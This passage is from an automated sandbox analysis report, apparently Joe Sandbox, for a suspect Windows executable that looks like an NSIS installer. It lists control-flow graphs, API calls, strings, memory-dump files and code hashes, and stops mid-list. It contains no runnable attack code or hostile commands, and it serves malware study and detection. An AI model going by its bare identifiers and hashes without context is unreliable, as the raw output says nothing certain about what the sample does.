                                                                                                                                                                                                                                    control_flow_graph 357 405d8e-405db4 call 406059 360 405db6-405dc8 DeleteFileW 357->360 361 405dcd-405dd4 357->361 362 405f4a-405f4e 360->362 363 405dd6-405dd8 361->363 364 405de7-405df7 call 406682 361->364 365 405ef8-405efd 363->365 366 405dde-405de1 363->366 370 405e06-405e07 call 405f9d 364->370 371 405df9-405e04 lstrcatW 364->371 365->362 369 405eff-405f02 365->369 366->364 366->365 372 405f04-405f0a 369->372 373 405f0c-405f14 call 4069df 369->373 374 405e0c-405e10 370->374 371->374 372->362 373->362 381 405f16-405f2a call 405f51 call 405d46 373->381 377 405e12-405e1a 374->377 378 405e1c-405e22 lstrcatW 374->378 377->378 380 405e27-405e43 lstrlenW FindFirstFileW 377->380 378->380 383 405e49-405e51 380->383 384 405eed-405ef1 380->384 397 405f42-405f45 call 405707 381->397 398 405f2c-405f2f 381->398 387 405e71-405e85 call 406682 383->387 388 405e53-405e5b 383->388 384->365 386 405ef3 384->386 386->365 399 405e87-405e8f 387->399 400 405e9c-405ea7 call 405d46 387->400 389 405ed0-405ee0 FindNextFileW 388->389 390 405e5d-405e65 388->390 389->383 396 405ee6-405ee7 FindClose 389->396 390->387 393 405e67-405e6f 390->393 393->387 393->389 396->384 397->362 398->372 401 405f31-405f40 call 405707 call 406442 398->401 399->389 402 405e91-405e9a call 405d8e 399->402 410 405ec8-405ecb call 405707 400->410 411 405ea9-405eac 400->411 401->362 402->389 410->389 414 405ec0-405ec6 411->414 415 405eae-405ebe call 405707 call 406442 411->415 414->389 415->389
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,75C53420,75C52EE0,"C:\Users\user\Desktop\2T10XBqS6g.exe"), ref: 00405DB7
                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00424F50,\*.*,00424F50,?,?,75C53420,75C52EE0,"C:\Users\user\Desktop\2T10XBqS6g.exe"), ref: 00405DFF
                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,00424F50,?,?,75C53420,75C52EE0,"C:\Users\user\Desktop\2T10XBqS6g.exe"), ref: 00405E22
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,00424F50,?,?,75C53420,75C52EE0,"C:\Users\user\Desktop\2T10XBqS6g.exe"), ref: 00405E28
                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00424F50,?,?,?,0040A014,?,00424F50,?,?,75C53420,75C52EE0,"C:\Users\user\Desktop\2T10XBqS6g.exe"), ref: 00405E38
                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ED8
                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405EE7
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\2T10XBqS6g.exe"$POB$\*.*
                                                                                                                                                                                                                                    • API String ID: 2035342205-4149284629
                                                                                                                                                                                                                                    • Opcode ID: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
                                                                                                                                                                                                                                    • Instruction ID: 5ad7ae4105776224b4bb644c15053e07d5ebc7bd6c5330578b1f64027da07968
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F41D330400A15AACB21AB65CC49BBF7678EF41718F24417FF895B11C1D77C4A82DEAE

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 678 406da0-406da5 679 406e16-406e34 678->679 680 406da7-406dd6 678->680 681 40740c-407421 679->681 682 406dd8-406ddb 680->682 683 406ddd-406de1 680->683 687 407423-407439 681->687 688 40743b-407451 681->688 684 406ded-406df0 682->684 685 406de3-406de7 683->685 686 406de9 683->686 689 406df2-406dfb 684->689 690 406e0e-406e11 684->690 685->684 686->684 691 407454-40745b 687->691 688->691 695 406e00-406e0c 689->695 696 406dfd 689->696 694 406fe3-407001 690->694 692 407482-40748e 691->692 693 40745d-407461 691->693 704 406c24-406c2d 692->704 698 407610-40761a 693->698 699 407467-40747f 693->699 701 407003-407017 694->701 702 407019-40702b 694->702 697 406e76-406ea4 695->697 696->695 705 406ec0-406eda 697->705 706 406ea6-406ebe 697->706 703 407626-407639 698->703 699->692 707 40702e-407038 701->707 702->707 710 40763e-407642 703->710 708 406c33 704->708 709 40763b 704->709 711 406edd-406ee7 705->711 706->711 712 40703a 707->712 713 406fdb-406fe1 707->713 714 406c3a-406c3e 708->714 715 406d7a-406d9b 708->715 716 406cdf-406ce3 708->716 717 406d4f-406d53 708->717 709->710 719 406eed 711->719 720 406e5e-406e64 711->720 721 406fb6-406fba 712->721 722 40714b-407158 712->722 713->694 718 406f7f-406f89 713->718 714->703 723 406c44-406c51 714->723 715->681 733 406ce9-406d02 716->733 734 40758f-407599 716->734 728 406d59-406d6d 717->728 729 40759e-4075a8 717->729 724 4075ce-4075d8 718->724 725 406f8f-406fb1 718->725 736 406e43-406e5b 719->736 737 4075aa-4075b4 719->737 726 406f17-406f1d 720->726 727 406e6a-406e70 720->727 730 406fc0-406fd8 721->730 731 4075c2-4075cc 721->731 722->704 723->709 738 406c57-406c9d 723->738 724->703 725->722 739 406f7b 726->739 741 406f1f-406f3d 726->741 727->697 727->739 740 406d70-406d78 728->740 729->703 730->713 731->703 735 406d05-406d09 733->735 734->703 735->716 742 406d0b-406d11 735->742 736->720 737->703 743 406cc5-406cc7 738->743 744 406c9f-406ca3 738->744 739->718 740->715 740->717 745 406f55-406f67 741->745 746 406f3f-406f53 741->746 748 406d13-406d1a 742->748 749 406d3b-406d4d 742->749 752 406cd5-406cdd 743->752 753 406cc9-406cd3 743->753 750 406ca5-406ca8 GlobalFree 744->750 751 406cae-406cbc GlobalAlloc 744->751 747 406f6a-406f74 745->747 746->747 747->726 754 406f76 747->754 755 406d25-406d35 GlobalAlloc 748->755 756 406d1c-406d1f GlobalFree 748->756 749->740 750->751 751->709 757 406cc2 751->757 752->735 753->752 753->753 759 4075b6-4075c0 754->759 760 406efc-406f14 754->760 755->709 755->749 756->755 757->743 759->703 760->726
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
                                                                                                                                                                                                                                    • Instruction ID: 5203db86b2e08fd3ebfde089d8ff8c44169432d1db75552ad8ea7513f2b1afa9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64F16570D04229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A86CF45
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(75C53420,00425F98,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,004060A2,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,C:\Users\user\AppData\Local\Temp\nsb3903.tmp,75C53420,?,75C52EE0,00405DAE,?,75C53420,75C52EE0), ref: 004069EA
                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004069F6
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\nsb3903.tmp, xrefs: 004069DF
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsb3903.tmp
                                                                                                                                                                                                                                    • API String ID: 2295610775-3692555289
                                                                                                                                                                                                                                    • Opcode ID: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                                                                                                                                                                                                    • Instruction ID: 87b64c9cece2c57c139ea7904c9da033401fae8fb112df8880c97ca139bbac6e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EBD012716096205BD64067386E0C94B7A589F16331722CA36F06BF21E0D7348C628A9C

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 151 403d54-403d6c call 406a76 154 403d80-403db7 call 406550 151->154 155 403d6e-403d7e call 4065c9 151->155 159 403db9-403dca call 406550 154->159 160 403dcf-403dd5 lstrcatW 154->160 164 403dda-403e03 call 40402a call 406059 155->164 159->160 160->164 169 403e95-403e9d call 406059 164->169 170 403e09-403e0e 164->170 175 403eab-403ed0 LoadImageW 169->175 176 403e9f-403ea6 call 4066bf 169->176 170->169 171 403e14-403e3c call 406550 170->171 171->169 178 403e3e-403e42 171->178 180 403f51-403f59 call 40140b 175->180 181 403ed2-403f02 RegisterClassW 175->181 176->175 182 403e54-403e60 lstrlenW 178->182 183 403e44-403e51 call 405f7e 178->183 194 403f63-403f6e call 40402a 180->194 195 403f5b-403f5e 180->195 184 404020 181->184 185 403f08-403f4c SystemParametersInfoW CreateWindowExW 181->185 189 403e62-403e70 lstrcmpiW 182->189 190 403e88-403e90 call 405f51 call 406682 182->190 183->182 188 404022-404029 184->188 185->180 189->190 193 403e72-403e7c GetFileAttributesW 189->193 190->169 197 403e82-403e83 call 405f9d 193->197 198 403e7e-403e80 193->198 204 403f74-403f8e ShowWindow call 406a06 194->204 205 403ff7-403fff call 4057da 194->205 195->188 197->190 198->190 198->197 210 403f90-403f95 call 406a06 204->210 211 403f9a-403fac GetClassInfoW 204->211 212 404001-404007 205->212 213 404019-40401b call 40140b 205->213 210->211 216 403fc4-403ff5 DialogBoxParamW call 40140b call 403ca4 211->216 217 403fae-403fbe GetClassInfoW RegisterClassW 211->217 212->195 218 40400d-404014 call 40140b 212->218 213->184 216->188 217->216 218->195
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00406A76: GetModuleHandleA.KERNEL32(?,?,?,00403755,?,?,?,?,?,?,?,?,?), ref: 00406A88
                                                                                                                                                                                                                                      • Part of subcall function 00406A76: GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3
                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,75C53420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\2T10XBqS6g.exe",00008001), ref: 00403DD5
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\eftermodnendes\ringeagt,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,75C53420), ref: 00403E55
                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\eftermodnendes\ringeagt,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000), ref: 00403E68
                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(Call), ref: 00403E73
                                                                                                                                                                                                                                    • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\eftermodnendes\ringeagt), ref: 00403EBC
                                                                                                                                                                                                                                      • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                                                                                                                                                                                                    • RegisterClassW.USER32(00428A00), ref: 00403EF9
                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403F11
                                                                                                                                                                                                                                    • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F46
                                                                                                                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403F7C
                                                                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,00428A00), ref: 00403FA8
                                                                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00428A00), ref: 00403FB5
                                                                                                                                                                                                                                    • RegisterClassW.USER32(00428A00), ref: 00403FBE
                                                                                                                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,00404102,00000000), ref: 00403FDD
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\2T10XBqS6g.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\eftermodnendes\ringeagt$Call$Control Panel\Desktop\ResourceLocale$H/B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                                                    • API String ID: 1975747703-3704159207
                                                                                                                                                                                                                                    • Opcode ID: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
                                                                                                                                                                                                                                    • Instruction ID: 33830a549d8bd1c9ff3d4095a28b7d5feb3a0022977f60bfd4e6bbc11b1c7dcb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4661D570200741BAD620AB669E46F2B3A7CEB84709F41453FFA45B61E2DF795902CB2D

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 225 4030d5-403123 GetTickCount GetModuleFileNameW call 406172 228 403125-40312a 225->228 229 40312f-40315d call 406682 call 405f9d call 406682 GetFileSize 225->229 230 40336f-403373 228->230 237 403163 229->237 238 403248-403256 call 403033 229->238 239 403168-40317f 237->239 244 403327-40332c 238->244 245 40325c-40325f 238->245 242 403181 239->242 243 403183-40318c call 4035e7 239->243 242->243 251 403192-403199 243->251 252 4032e3-4032eb call 403033 243->252 244->230 247 403261-403279 call 4035fd call 4035e7 245->247 248 40328b-4032d7 GlobalAlloc call 406bd1 call 4061a1 CreateFileW 245->248 247->244 271 40327f-403285 247->271 276 4032d9-4032de 248->276 277 4032ed-40331d call 4035fd call 403376 248->277 255 403215-403219 251->255 256 40319b-4031af call 40612d 251->256 252->244 261 403223-403229 255->261 262 40321b-403222 call 403033 255->262 256->261 274 4031b1-4031b8 256->274 267 403238-403240 261->267 268 40322b-403235 call 406b63 261->268 262->261 267->239 275 403246 267->275 268->267 271->244 271->248 274->261 280 4031ba-4031c1 274->280 275->238 276->230 285 403322-403325 277->285 280->261 282 4031c3-4031ca 280->282 282->261 284 4031cc-4031d3 282->284 284->261 286 4031d5-4031f5 284->286 285->244 288 40332e-40333f 285->288 286->244 287 4031fb-4031ff 286->287 289 403201-403205 287->289 290 403207-40320f 287->290 291 403341 288->291 292 403347-40334c 288->292 289->275 289->290 290->261 293 403211-403213 290->293 291->292 294 40334d-403353 292->294 293->261 294->294 295 403355-40336d call 40612d 294->295 295->230
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004030E9
                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\2T10XBqS6g.exe,00000400), ref: 00403105
                                                                                                                                                                                                                                      • Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\2T10XBqS6g.exe,80000000,00000003), ref: 00406176
                                                                                                                                                                                                                                      • Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406198
                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\2T10XBqS6g.exe,C:\Users\user\Desktop\2T10XBqS6g.exe,80000000,00000003), ref: 0040314E
                                                                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(?,00008001), ref: 00403290
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\2T10XBqS6g.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\2T10XBqS6g.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                    • API String ID: 2803837635-2093493955
                                                                                                                                                                                                                                    • Opcode ID: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                                                                                                                                                                                                    • Instruction ID: fa10dec2ede943269712b0c7dd26c00cc534fb31fc6fa5581d899c5550bae655
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0171B071E00204ABDB20DFA4ED86B9E7AACAB04316F60457FF515B62D1CB7C9E418B5C

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 298 4066bf-4066c8 299 4066ca-4066d9 298->299 300 4066db-4066f5 298->300 299->300 301 406905-40690b 300->301 302 4066fb-406707 300->302 304 406911-40691e 301->304 305 406719-406726 301->305 302->301 303 40670d-406714 302->303 303->301 307 406920-406925 call 406682 304->307 308 40692a-40692d 304->308 305->304 306 40672c-406735 305->306 309 4068f2 306->309 310 40673b-40677e 306->310 307->308 312 406900-406903 309->312 313 4068f4-4068fe 309->313 314 406784-406790 310->314 315 406896-40689a 310->315 312->301 313->301 316 406792 314->316 317 40679a-40679c 314->317 318 40689c-4068a3 315->318 319 4068ce-4068d2 315->319 316->317 324 4067d6-4067d9 317->324 325 40679e-4067c4 call 406550 317->325 322 4068b3-4068bf call 406682 318->322 323 4068a5-4068b1 call 4065c9 318->323 320 4068e2-4068f0 lstrlenW 319->320 321 4068d4-4068dd call 4066bf 319->321 320->301 321->320 337 4068c4-4068ca 322->337 323->337 326 4067db-4067e7 GetSystemDirectoryW 324->326 327 4067ec-4067ef 324->327 340 40687e-406881 325->340 342 4067ca-4067d1 call 4066bf 325->342 332 406879-40687c 326->332 333 406801-406805 327->333 334 4067f1-4067fd GetWindowsDirectoryW 327->334 339 40688e-406894 call 406930 332->339 332->340 333->332 341 406807-406825 333->341 334->333 337->320 338 4068cc 337->338 338->339 339->320 340->339 343 406883-406889 lstrcatW 340->343 345 406827-40682d 341->345 346 406839-406851 call 406a76 341->346 342->332 343->339 351 406835-406837 345->351 355 406853-406866 SHGetPathFromIDListW CoTaskMemFree 346->355 356 406868-406871 346->356 351->346 353 406873-406877 351->353 353->332 355->353 355->356 356->341 356->353
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067E1
                                                                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004067F7
                                                                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406855
                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040685E
                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 00406889
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(Call,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004068E3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.29606037229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29605942751.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606106265.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606181681.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.29606581284.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
